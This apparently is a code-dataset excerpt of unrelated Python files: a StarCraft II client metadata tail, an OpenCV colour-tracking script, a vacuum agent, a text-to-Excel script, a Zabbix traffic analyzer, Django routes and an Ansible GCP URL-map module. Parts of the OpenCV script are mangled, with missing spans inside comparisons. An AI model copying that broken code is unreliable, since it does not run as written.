{"api_name": "client._game_result", "line_number": 302, "usage_type": "attribute"}, {"api_name": "client._game_result", "line_number": 304, "usage_type": "attribute"}, {"api_name": "client._game_result", "line_number": 308, "usage_type": "attribute"}, {"api_name": "client._game_result", "line_number": 309, "usage_type": "attribute"}, {"api_name": "game_state.GameState", "line_number": 310, "usage_type": "call"}, {"api_name": "client._execute", "line_number": 313, "usage_type": "call"}, {"api_name": "s2clientprotocol.sc2api_pb2.RequestGameInfo", "line_number": 313, "usage_type": "call"}, {"api_name": "s2clientprotocol.sc2api_pb2", "line_number": 313, "usage_type": "name"}, {"api_name": "protocol.ProtocolError", "line_number": 332, "usage_type": "argument"}, {"api_name": "data.Result.Victory", "line_number": 339, "usage_type": "attribute"}, {"api_name": "data.Result", "line_number": 339, "usage_type": "name"}, {"api_name": "data.Result.Defeat", "line_number": 346, "usage_type": "attribute"}, {"api_name": "data.Result", "line_number": 346, "usage_type": "name"}, {"api_name": "data.Result.Defeat", "line_number": 350, "usage_type": "attribute"}, {"api_name": "data.Result", "line_number": 350, "usage_type": "name"}, {"api_name": "data.Result.Defeat", "line_number": 351, "usage_type": "attribute"}, {"api_name": "data.Result", "line_number": 351, "usage_type": "name"}, {"api_name": "client.in_game", "line_number": 356, "usage_type": "attribute"}, {"api_name": "data.Result.Victory", "line_number": 357, "usage_type": "attribute"}, {"api_name": "data.Result", "line_number": 357, "usage_type": "name"}, {"api_name": "data.Result.Victory", "line_number": 358, "usage_type": "attribute"}, {"api_name": "data.Result", "line_number": 358, "usage_type": "name"}, {"api_name": "client.step", "line_number": 360, "usage_type": "call"}, {"api_name": "data.CreateGameError", "line_number": 368, "usage_type": "call"}, {"api_name": "client.Client", "line_number": 374, "usage_type": "call"}, {"api_name": "player.Human", "line_number": 393, "usage_type": "name"}, {"api_name": "player.Bot", "line_number": 393, "usage_type": "name"}, {"api_name": "sc2process.SC2Process", "line_number": 395, "usage_type": "call"}, {"api_name": "player.Human", "line_number": 402, "usage_type": "argument"}, {"api_name": "client.raw_affects_selection", "line_number": 403, "usage_type": "attribute"}, {"api_name": "client.save_replay", "line_number": 410, "usage_type": "call"}, {"api_name": "client.leave", "line_number": 411, "usage_type": "call"}, {"api_name": "client.quit", "line_number": 412, "usage_type": "call"}, {"api_name": "protocol.ConnectionAlreadyClosed", "line_number": 413, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 414, "usage_type": "call"}, {"api_name": "player.Human", "line_number": 425, "usage_type": "name"}, {"api_name": "player.Bot", "line_number": 425, "usage_type": "name"}, {"api_name": "sc2process.SC2Process", "line_number": 427, "usage_type": "call"}, {"api_name": "player.Human", "line_number": 432, "usage_type": "argument"}, {"api_name": "client.raw_affects_selection", "line_number": 433, "usage_type": "attribute"}, {"api_name": "client.save_replay", "line_number": 439, "usage_type": "call"}, {"api_name": "client.leave", "line_number": 440, "usage_type": "call"}, {"api_name": "protocol.ConnectionAlreadyClosed", "line_number": 441, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 442, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 454, "usage_type": 
"call"}, {"api_name": "sc2process.SC2Process", "line_number": 460, "usage_type": "call"}, {"api_name": "client.Client", "line_number": 463, "usage_type": "call"}, {"api_name": "player.Human", "line_number": 465, "usage_type": "argument"}, {"api_name": "client.raw_affects_selection", "line_number": 466, "usage_type": "attribute"}, {"api_name": "client.save_replay", "line_number": 471, "usage_type": "call"}, {"api_name": "client.leave", "line_number": 472, "usage_type": "call"}, {"api_name": "client.quit", "line_number": 473, "usage_type": "call"}, {"api_name": "protocol.ConnectionAlreadyClosed", "line_number": 474, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 475, "usage_type": "call"}, {"api_name": "client.Client", "line_number": 483, "usage_type": "call"}, {"api_name": "sc2process.SC2Process", "line_number": 487, "usage_type": "call"}, {"api_name": "six.BytesIO", "line_number": 498, "usage_type": "call"}, {"api_name": "mpyq.MPQArchive", "line_number": 501, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 502, "usage_type": "call"}, {"api_name": "player.Human", "line_number": 507, "usage_type": "name"}, {"api_name": "player.Bot", "line_number": 507, "usage_type": "name"}, {"api_name": "portconfig.Portconfig", "line_number": 511, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 512, "usage_type": "call"}, {"api_name": "asyncio.gather", "line_number": 513, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop", "line_number": 519, "usage_type": "call"}, {"api_name": "portconfig.Portconfig", "line_number": 524, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 525, "usage_type": "call"}, {"api_name": "os.path", "line_number": 525, "usage_type": "attribute"}, {"api_name": "os.path.isabs", "line_number": 526, "usage_type": "call"}, {"api_name": "os.path", "line_number": 526, "usage_type": "attribute"}, {"api_name": "asyncio.get_event_loop", "line_number": 530, "usage_type": "call"}]} +{"seq_id": "14211099431", "text": "import cv2\r\nimport numpy as np\r\nfrom csv_managment import comparate_with_database\r\nimport socket\r\n\r\nadress = '0.0.0.0'\r\nport = 8081\r\n\r\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nsock.bind((adress, port))\r\nsock.listen(1)\r\n\r\nconnections = []\r\nwithAndroid = False\r\n\r\nfinger_position_list = [[], []]\r\n\r\ndef string(vec):\r\n result = \"\"\r\n for i in vec:\r\n result += str(i) + \"!\"\r\n\r\n return result\r\n\r\ndef send(message):\r\n for connection in connections:\r\n connection.send(bytes(message + \"\\n\", 'utf-8'))\r\n\r\nif (withAndroid):\r\n print(\"Waiting for connections\")\r\n while True:\r\n client, a = sock.accept()\r\n connections.append(client)\r\n break\r\n\r\n print(\"Connected\")\r\n print(connections)\r\n\r\ncap = cv2.VideoCapture(0)\r\n_, img3 = cap.read()\r\n\r\nx1, y1, x2, y2 = 0,0,0,0\r\n\r\ncounter = 0\r\nsalidaFinal = \"\"\r\nisSend = False\r\nmensaje = \"\"\r\nwhile (cap.isOpened()):\r\n _, frame = cap.read()\r\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\r\n \r\n # define range of white color in HSV\r\n # change it according to your need !\r\n #lower_white = np.array([0, 0, 215])\r\n #upper_white = np.array([180, 15, 255])\r\n #lower_white = np.array([0, 0, 230])\r\n #upper_white = np.array([180, 25, 255])\r\n \r\n # Threshold the HSV image to get only white colors\r\n #mask = cv2.inRange(hsv, lower_white, upper_white)\r\n # Bitwise-AND mask and original image\r\n #res = cv2.bitwise_and(frame,frame, mask= mask)\r\n 
#umbral = cv2.threshold(mask, 25, 255, cv2.THRESH_BINARY)[1]\r\n #umbral = cv2.dilate(umbral, None, iterations=2)\r\n \r\n #contornosimg = umbral.copy()\r\n # Buscamos contorno en la imagen\r\n #im, contornos, hierarchy = cv2.findContours(contornosimg,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\r\n \r\n \r\n \r\n \"\"\"\r\n for c in contornos:\r\n # Eliminamos los contornos más pequeños\r\n if (cv2.contourArea(c) < 4000):\r\n continue\r\n # Obtenemos el bounds del contorno, el rectángulo mayor que engloba al contorno\r\n elif(cv2.contourArea(c) > 40000):\r\n continue\r\n else:\r\n \r\n (xa, ya, wa, ha) = cv2.boundingRect(c)\r\n # Dibujamos el rectángulo del bounds\r\n if(xa>40 and ya>40 and wa+80(x1+30) or xa<(x1-30)):\r\n if(x1(y1+30) or ya<(y1-30)):\r\n if(y1 2000):\r\n continue\r\n else:\r\n (x, y, w, h) = cv2.boundingRect(c)\r\n # Dibujamos el rectángulo del bounds\r\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 0, 255), 2)\r\n red_objects.append([x+w/2 , y+h/2])\r\n cv2.putText(frame,\"RED color\",(x,y),cv2.FONT_HERSHEY_SIMPLEX,0.7,(0,0,255))\r\n xr = x\r\n yr = y\r\n \r\n contornosimg = blue.copy()\r\n im, contornos, hierarchy = cv2.findContours(contornosimg,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\r\n xb = 0\r\n yb = 0\r\n for c in contornos:\r\n # Eliminamos los contornos más pequeños\r\n if (cv2.contourArea(c) < 200):\r\n continue\r\n # Obtenemos el bounds del contorno, el rectángulo mayor que engloba al contorno\r\n elif(cv2.contourArea(c) > 2000):\r\n continue\r\n else:\r\n (x, y, w, h) = cv2.boundingRect(c)\r\n # Dibujamos el rectángulo del bounds\r\n cv2.rectangle(frame, (x, y), (x +w, y+h), (255, 0, 0), 2)\r\n blue_objects.append([(x + w)/2 , (y+h)/2])\r\n xb = x\r\n yb = y\r\n cv2.putText(frame,\"BLUE color\",(x,y),cv2.FONT_HERSHEY_SIMPLEX,0.7,(255,0,0))\r\n\r\n \r\n\r\n #Tracking the YELLOW Color\r\n \r\n contornosimg = yellow.copy()\r\n im, contornos, hierarchy = cv2.findContours(contornosimg,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\r\n for c in contornos:\r\n # Eliminamos los contornos más pequeños\r\n if (cv2.contourArea(c) < 200):\r\n continue\r\n # Obtenemos el bounds del contorno, el rectángulo mayor que engloba al contorno\r\n elif(cv2.contourArea(c) > 2000):\r\n continue\r\n else:\r\n (x, y, w, h) = cv2.boundingRect(c)\r\n # Dibujamos el rectángulo del bounds\r\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)\r\n yellow_objects.append([x+w/2 , y+h/2])\r\n cv2.putText(frame,\"YELLLOW color\",(x,y),cv2.FONT_HERSHEY_SIMPLEX,1,(255,0,0))\r\n \r\n\r\n\r\n #Tracking the purple Color\r\n contornosimg = purple.copy()\r\n im, contornos, hierarchy = cv2.findContours(contornosimg,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\r\n for c in contornos:\r\n # Eliminamos los contornos más pequeños\r\n if (cv2.contourArea(c) < 200):\r\n continue\r\n # Obtenemos el bounds del contorno, el rectángulo mayor que engloba al contorno\r\n elif(cv2.contourArea(c) > 2000):\r\n continue\r\n else:\r\n (x, y, w, h) = cv2.boundingRect(c)\r\n # Dibujamos el rectángulo del bounds\r\n cv2.rectangle(frame, (x, y), (x + w, y + h), (255,0,255),2)\r\n purple_objects.append([x+w/2 , y+h/2])\r\n cv2.putText(frame,\"purple color\",(x,y),cv2.FONT_HERSHEY_SIMPLEX,1,(255,0,0))\r\n \r\n \r\n\r\n #Tracking the green Color\r\n \r\n contornosimg = green.copy()\r\n im, contornos, hierarchy = cv2.findContours(contornosimg,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\r\n for c in contornos:\r\n # Eliminamos los contornos más pequeños\r\n if (cv2.contourArea(c) < 200):\r\n continue\r\n # Obtenemos el bounds del 
contorno, el rectángulo mayor que engloba al contorno\r\n elif(cv2.contourArea(c) > 2000):\r\n continue\r\n else:\r\n (x, y, w, h) = cv2.boundingRect(c)\r\n # Dibujamos el rectángulo del bounds\r\n cv2.rectangle(frame, (x, y), (x + w, y + h), (255,0,255),2)\r\n green_objects.append([x+w/2 , y+h/2])\r\n cv2.putText(frame,\"green color\",(x,y),cv2.FONT_HERSHEY_SIMPLEX,1,(255,0,0))\r\n \r\n \r\n\r\n #Tracking the black Color\r\n \r\n contornosimg = black.copy()\r\n im, contornos, hierarchy = cv2.findContours(contornosimg,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\r\n for c in contornos:\r\n # Eliminamos los contornos más pequeños\r\n if (cv2.contourArea(c) < 200):\r\n continue\r\n # Obtenemos el bounds del contorno, el rectángulo mayor que engloba al contorno\r\n elif(cv2.contourArea(c) > 2000):\r\n continue\r\n else:\r\n (x, y, w, h) = cv2.boundingRect(c)\r\n # Dibujamos el rectángulo del bounds\r\n cv2.rectangle(frame, (x, y), (x + w, y + h), (255,0,255),2)\r\n black_objects.append([x+w/2 , y+h/2])\r\n cv2.putText(frame,\"black color\",(x,y),cv2.FONT_HERSHEY_SIMPLEX,1,(255,0,0))\r\n \r\n \r\n\r\n #Tracking the orange Color\r\n \r\n \r\n \r\n \r\n \r\n contornosimg = orange.copy()\r\n im, contornos, hierarchy = cv2.findContours(contornosimg,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\r\n for c in contornos:\r\n # Eliminamos los contornos más pequeños\r\n if (cv2.contourArea(c) < 200):\r\n continue\r\n # Obtenemos el bounds del contorno, el rectángulo mayor que engloba al contorno\r\n elif(cv2.contourArea(c) > 2000):\r\n continue\r\n else:\r\n (x, y, w, h) = cv2.boundingRect(c)\r\n # Dibujamos el rectángulo del bounds\r\n cv2.rectangle(frame, (x, y), (x + w, y + h), (255,0,255),2)\r\n orange_objects.append([x+w/2 , y+h/2])\r\n cv2.putText(frame,\"orange color\",(x,y),cv2.FONT_HERSHEY_SIMPLEX,1,(255,0,0))\r\n\r\n \r\n \r\n \r\n if(xb==0):\r\n if(xr>(x1+30) or xr<(x1-30)):\r\n if(x1(y1+30) or yr<(y1-30)):\r\n if(y1(x2+30) or xb<(x2-30)):\r\n if(x1(y2+30) or yb<(y2-30)):\r\n if(y2 Actuator:\n location: str = location_status.name\n status: str = location_status.value\n\n action: str = ''\n if status == 'Dirty':\n action = 'Suck'\n elif location == 'A':\n action = 'Right'\n elif location == 'B':\n action = 'Left'\n\n return Actuator('action', action)\n", "repo_name": "GrahamStrickland/aima", "sub_path": "ch02/agents/reflex_vacuum_agent.py", "file_name": "reflex_vacuum_agent.py", "file_ext": "py", "file_size_in_byte": 452, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "modules.sensor.Sensor", "line_number": 6, "usage_type": "name"}, {"api_name": "modules.actuator.Actuator", "line_number": 18, "usage_type": "call"}, {"api_name": "modules.actuator.Actuator", "line_number": 6, "usage_type": "name"}]} +{"seq_id": "12958861331", "text": "#! 
python3\r\n# Reads text files, put them into lists and then input into an excel file\r\nimport openpyxl, os\r\ndef TextToExcel(folder):\r\n wb = openpyxl.Workbook()\r\n sheet = wb.active\r\n num_column = 0\r\n # Going through the file\r\n for foldername, subfolders, filenames in os.walk(folder):\r\n for fl_int in range(len(filenames)):\r\n filename = list(filenames)\r\n file_ = open(foldername + '\\\\' + filename[fl_int],'r')\r\n # Acquiring the text form .txt\r\n text_ = file_.readlines()\r\n text_ = text_[0].split(' ')\r\n for num_row in range(len(text_)):\r\n sheet.cell(row = num_row + 1, column = num_column + 1).value = text_[num_row]\r\n print(text_[num_row])\r\n num_column += 1\r\n wb.save('TextToExcel.xlsx')\r\n\r\nTextToExcel(r'C:\\Users\\Dr. Wan Asna\\Desktop\\Python Projects\\Automate the Boring Stuff\\Ch.13 - Working with Excel Spreadsheets\\num')", "repo_name": "QaisZainon/Learning-Coding", "sub_path": "Automate the Boring Stuff/Ch.13 - Working with Excel Spreadsheets/TextFilestoSpreadsheet.py", "file_name": "TextFilestoSpreadsheet.py", "file_ext": "py", "file_size_in_byte": 954, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "openpyxl.Workbook", "line_number": 5, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "73550887553", "text": "from pyzabbix import ZabbixAPI\nfrom zabbix import Zabbix\nimport time\nimport json\nfrom datetime import datetime\nimport os.path\nfrom os import path\n\n\nclass TrafficAnalyzer:\n\n def __init__(self, in_traffic_tag, in_incoming_traffic_id, in_outgoing_traffic_id):\n self.traffic_tag = in_traffic_tag\n self.incoming_traffic_id = in_incoming_traffic_id\n self.outgoing_traffic_id = in_outgoing_traffic_id\n\n self.final_result = list()\n\n # Zabbix API Credentials\n self.zabbix = Zabbix()\n self.ZABBIX_SERVER = self.zabbix.ZABBIX_SERVER\n self.ZABBIX_USER = self.zabbix.ZABBIX_USER\n self.ZABBIX_PSSW = self.zabbix.ZABBIX_PSSW\n self.zapi = ZabbixAPI(self.ZABBIX_SERVER)\n self.zapi.login(self.ZABBIX_USER, self.ZABBIX_PSSW)\n\n # Time frame to be considered\n self.time_till = time.mktime(datetime.now().timetuple())\n self.time_from = self.time_till - 60 * 60 * 1 # last 1 hours\n\n if path.exists('data_file.json'):\n os.remove('data_file.json')\n \n def check_traffic(self, source):\n \"\"\"\n Method to retrieve the historical values from some item (port) given its ID\n API connection to get item's history \n The returned values contains the item id, clock, value, and ns\n \"\"\"\n result = list()\n \n # Query item's history (integer) data\n history = self.zapi.history.get(itemids=[source],\n time_from=self.time_from,\n time_till=self.time_till,\n output='extend',\n limit='5000')\n\n # If nothing was found, try getting it from history (float) data\n if not len(history):\n history = self.zapi.history.get(itemids=[source],\n time_from=self.time_from,\n time_till=self.time_till,\n output='extend',\n limit='5000',\n history=0)\n\n # Create the list with entries using each data point information\n for point in history:\n result.append((int(point['clock']), int(point['value'])))\n\n return result\n\n def get_traffic(self, traffic_type='in'):\n \"\"\"\n Method to check Node/Port traffic\n \"\"\"\n if traffic_type == 'in':\n return self.check_traffic(self.incoming_traffic_id)\n else:\n return self.check_traffic(self.outgoing_traffic_id)\n\n def merge_traffic(self, source1, source2):\n \"\"\"\n Method to merge both traffic 
values into the same data structure\n \"\"\"\n i = 0\n while i < len(source1):\n tmp = (source1[i][0], source1[i][1], source2[i][1])\n self.final_result.append(tmp)\n i += 1\n\n def build_json(self, tag, points):\n \"\"\"\n Method to create a json object given the tag name and the points list\n \"\"\"\n dict_obj = {tag: {\"name\": \"\", \"utc\": True, \"columns\": [\"time\", \"in\", \"out\"],\n \"points\": points}}\n r = json.dumps(dict_obj)\n\n if path.exists('data_file.json'):\n data = dict()\n with open(\"data_file.json\", 'r+') as write_file:\n old_data = json.load(write_file)\n data = dict(old_data)\n data.update(dict_obj)\n\n # Reopen with 'w' so the file is truncated before rewriting;\n # 'r+' would leave stale bytes behind if the new JSON is shorter.\n with open(\"data_file.json\", 'w') as write_file:\n json.dump(data, write_file)\n else:\n with open(\"data_file.json\", 'w+') as write_file:\n json.dump(dict_obj, write_file)\n\n print(r)\n\n def traffic_on_json(self):\n \"\"\"\n Compute the incoming and outgoing traffic, merge both into the same data structure,\n and send that result to be structured as JSON\n \"\"\"\n # Incoming Traffic\n results1 = self.get_traffic('in')\n\n # Outgoing Traffic\n results2 = self.get_traffic('out')\n\n self.merge_traffic(results1, results2)\n\n print(\"Merged Traffic\")\n self.build_json(self.traffic_tag, self.final_result)\n\n return self.final_result\n\n def total_traffic(self, source1, source2):\n \"\"\"\n Method to compute the total traffic between two points\n \"\"\"\n i = 0\n out_total_traffic = list()\n while i < len(source1):\n tmp = (source2[i][0], source1[i][1] + source2[i][1], source1[i][2] + source2[i][2])\n out_total_traffic.append(tmp)\n i += 1\n\n print(\"Total Traffic\")\n self.build_json(\"Total\", out_total_traffic)\n", "repo_name": "amlight/weathermap", "sub_path": "venv/include/trafficanalyzer.py", "file_name": "trafficanalyzer.py", "file_ext": "py", "file_size_in_byte": 4792, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "zabbix.Zabbix", "line_number": 20, "usage_type": "call"}, {"api_name": "pyzabbix.ZabbixAPI", "line_number": 24, "usage_type": "call"}, {"api_name": "time.mktime", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 28, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "name"}, {"api_name": "os.path.remove", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path", "line_number": 91, "usage_type": "name"}, {"api_name": "json.load", "line_number": 94, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 99, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 102, "usage_type": "call"}]}
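Aside: build_json above persists results through a read-modify-write cycle on data_file.json. Below is a minimal standalone sketch of that pattern; the file name is taken from the record, and the merge semantics are assumed to be a shallow dict update.

import json, os

def upsert_json(path, new_entry):
    # Read the existing document if present, merge in the new keys,
    # then rewrite the whole file from scratch.
    data = {}
    if os.path.exists(path):
        with open(path) as f:
            data = json.load(f)
    data.update(new_entry)         # shallow merge: new keys win
    with open(path, 'w') as f:     # 'w' truncates, so no stale bytes remain
        json.dump(data, f)

upsert_json('data_file.json', {'Total': {'points': []}})

Rewriting with 'w' matters here: reopening with 'r+' leaves trailing bytes behind whenever the new document is shorter than the old one, which silently corrupts the JSON on disk.

+{"seq_id": "12816261862", "text": "from django.conf.urls import url\nfrom django.conf.urls.static import static\nfrom django.conf import settings\n\nfrom . 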
import views\n\napp_name = \"website\"\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^login$', views.login_user, name='login'),\n url(r'^logout$', views.user_logout, name='logout'),\n url(r'^register$', views.register, name='register'),\n url(r'^addmember$', views.addmember, name='addmember'), \n url(r'^adddetainee$', views.add_detainee, name='detainee'),\n url(r'^addsession$', views.session, name='addsession'),\n url(r'^session/(?P\\d+)/$', views.updatesessionrole.as_view(), name='updatesession'),\n url(r'^detainee/(?P\\d+)/$', views.detainee, name='detaineedetail'),\n url(r'^createreport$', views.report, name='report'),\n url(r'^report/(?P\\d+)/$', views.singlereport, name='singlereport'),\n url(r'^editreport/(?P\\d+)/$', views.editreport.as_view(), name='editreport'),\n url(r'^editprofile$', views.editprofile, name='editprofile'),\n url(r'^team$', views.team, name='team'),\n url(r'^pdfreport/(?P\\d+)/$', views.pdfreport, name='pdf')\n # url(r'^deleteuser$', views.userdelete, name='deleteuser'),\n]\n\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)", "repo_name": "jcarter0149/reports-cap_stone_back", "sub_path": "website/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1271, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 18, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 19, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 20, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 21, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 22, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 23, "usage_type": "call"}, {"api_name": "django.conf.urls.static.static", "line_number": 27, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_URL", "line_number": 27, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 27, "usage_type": "name"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 27, "usage_type": "attribute"}]} +{"seq_id": "29366537851", "text": "from __future__ import absolute_import, division, print_function\n__metaclass__ = type\n\n################################################################################\n# Documentation\n################################################################################\n\nANSIBLE_METADATA = {'metadata_version': '1.1',\n 'status': [\"preview\"],\n 'supported_by': 'community'}\n\nDOCUMENTATION = '''\n---\nmodule: gcp_compute_url_map\ndescription:\n - UrlMaps are used to route requests to a backend service based on rules that you\n define for the host and path of an incoming 
URL.\nshort_description: Creates a GCP UrlMap\nversion_added: 2.6\nauthor: Google Inc. (@googlecloudplatform)\nrequirements:\n - python >= 2.6\n - requests >= 2.18.4\n - google-auth >= 1.3.0\noptions:\n state:\n description:\n - Whether the given object should exist in GCP\n choices: ['present', 'absent']\n default: 'present'\n default_service:\n description:\n - A reference to BackendService resource if none of the hostRules match.\n required: true\n description:\n description:\n - An optional description of this resource. Provide this property when you create\n the resource.\n required: false\n host_rules:\n description:\n - The list of HostRules to use against the URL.\n required: false\n suboptions:\n description:\n description:\n - An optional description of this resource. Provide this property when you create\n the resource.\n required: false\n hosts:\n description:\n - The list of host patterns to match. They must be valid hostnames, except * will\n match any string of ([a-z0-9-.]*). In that case, * must be the first character and\n must be followed in the pattern by either - or .\n required: false\n path_matcher:\n description:\n - The name of the PathMatcher to use to match the path portion of the URL if the hostRule\n matches the URL's host portion.\n required: false\n name:\n description:\n - Name of the resource. Provided by the client when the resource is created. The name\n must be 1-63 characters long, and comply with RFC1035. Specifically, the name must\n be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?`\n which means the first character must be a lowercase letter, and all following characters\n must be a dash, lowercase letter, or digit, except the last character, which cannot\n be a dash.\n required: false\n path_matchers:\n description:\n - The list of named PathMatchers to use against the URL.\n required: false\n suboptions:\n default_service:\n description:\n - A reference to a BackendService resource. This will be used if none of the pathRules\n defined by this PathMatcher is matched by the URL's path portion.\n required: false\n description:\n description:\n - An optional description of this resource.\n required: false\n name:\n description:\n - The name to which this PathMatcher is referred by the HostRule.\n required: false\n path_rules:\n description:\n - The list of path rules.\n required: false\n suboptions:\n paths:\n description:\n - 'The list of path patterns to match. Each must start with / and the only place a\n * is allowed is at the end following a /. The string fed to the path matcher does\n not include any text after the first ? or #, and those chars are not allowed here.'\n required: false\n service:\n description:\n - A reference to the BackendService resource if this rule is matched.\n required: false\n tests:\n description:\n - The list of expected URL mappings. 
Request to update this UrlMap will succeed only\n if all of the test cases pass.\n required: false\n suboptions:\n description:\n description:\n - Description of this test case.\n required: false\n host:\n description:\n - Host portion of the URL.\n required: false\n path:\n description:\n - Path portion of the URL.\n required: false\n service:\n description:\n - A reference to expected BackendService resource the given URL should be mapped to.\n required: false\nextends_documentation_fragment: gcp\n'''\n\nEXAMPLES = '''\n- name: create a instance group\n gcp_compute_instance_group:\n name: \"instancegroup-urlmap\"\n zone: us-central1-a\n project: \"{{ gcp_project }}\"\n auth_kind: \"{{ gcp_cred_kind }}\"\n service_account_file: \"{{ gcp_cred_file }}\"\n state: present\n register: instancegroup\n\n- name: create a http health check\n gcp_compute_http_health_check:\n name: \"httphealthcheck-urlmap\"\n healthy_threshold: 10\n port: 8080\n timeout_sec: 2\n unhealthy_threshold: 5\n project: \"{{ gcp_project }}\"\n auth_kind: \"{{ gcp_cred_kind }}\"\n service_account_file: \"{{ gcp_cred_file }}\"\n state: present\n register: healthcheck\n\n- name: create a backend service\n gcp_compute_backend_service:\n name: \"backendservice-urlmap\"\n backends:\n - group: \"{{ instancegroup }}\"\n health_checks:\n - \"{{ healthcheck.selfLink }}\"\n enable_cdn: true\n project: \"{{ gcp_project }}\"\n auth_kind: \"{{ gcp_cred_kind }}\"\n service_account_file: \"{{ gcp_cred_file }}\"\n state: present\n register: backendservice\n\n- name: create a url map\n gcp_compute_url_map:\n name: \"test_object\"\n default_service: \"{{ backendservice }}\"\n project: \"test_project\"\n auth_kind: \"service_account\"\n service_account_file: \"/tmp/auth.pem\"\n state: present\n'''\n\nRETURN = '''\n creation_timestamp:\n description:\n - Creation timestamp in RFC3339 text format.\n returned: success\n type: str\n default_service:\n description:\n - A reference to BackendService resource if none of the hostRules match.\n returned: success\n type: dict\n description:\n description:\n - An optional description of this resource. Provide this property when you create\n the resource.\n returned: success\n type: str\n host_rules:\n description:\n - The list of HostRules to use against the URL.\n returned: success\n type: complex\n contains:\n description:\n description:\n - An optional description of this resource. Provide this property when you create\n the resource.\n returned: success\n type: str\n hosts:\n description:\n - The list of host patterns to match. They must be valid hostnames, except * will\n match any string of ([a-z0-9-.]*). In that case, * must be the first character and\n must be followed in the pattern by either - or .\n returned: success\n type: list\n path_matcher:\n description:\n - The name of the PathMatcher to use to match the path portion of the URL if the hostRule\n matches the URL's host portion.\n returned: success\n type: str\n id:\n description:\n - The unique identifier for the resource.\n returned: success\n type: int\n name:\n description:\n - Name of the resource. Provided by the client when the resource is created. The name\n must be 1-63 characters long, and comply with RFC1035. 
Specifically, the name must\n be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?`\n which means the first character must be a lowercase letter, and all following characters\n must be a dash, lowercase letter, or digit, except the last character, which cannot\n be a dash.\n returned: success\n type: str\n path_matchers:\n description:\n - The list of named PathMatchers to use against the URL.\n returned: success\n type: complex\n contains:\n default_service:\n description:\n - A reference to a BackendService resource. This will be used if none of the pathRules\n defined by this PathMatcher is matched by the URL's path portion.\n returned: success\n type: dict\n description:\n description:\n - An optional description of this resource.\n returned: success\n type: str\n name:\n description:\n - The name to which this PathMatcher is referred by the HostRule.\n returned: success\n type: str\n path_rules:\n description:\n - The list of path rules.\n returned: success\n type: complex\n contains:\n paths:\n description:\n - 'The list of path patterns to match. Each must start with / and the only place a\n * is allowed is at the end following a /. The string fed to the path matcher does\n not include any text after the first ? or #, and those chars are not allowed here.'\n returned: success\n type: list\n service:\n description:\n - A reference to the BackendService resource if this rule is matched.\n returned: success\n type: dict\n tests:\n description:\n - The list of expected URL mappings. Request to update this UrlMap will succeed only\n if all of the test cases pass.\n returned: success\n type: complex\n contains:\n description:\n description:\n - Description of this test case.\n returned: success\n type: str\n host:\n description:\n - Host portion of the URL.\n returned: success\n type: str\n path:\n description:\n - Path portion of the URL.\n returned: success\n type: str\n service:\n description:\n - A reference to expected BackendService resource the given URL 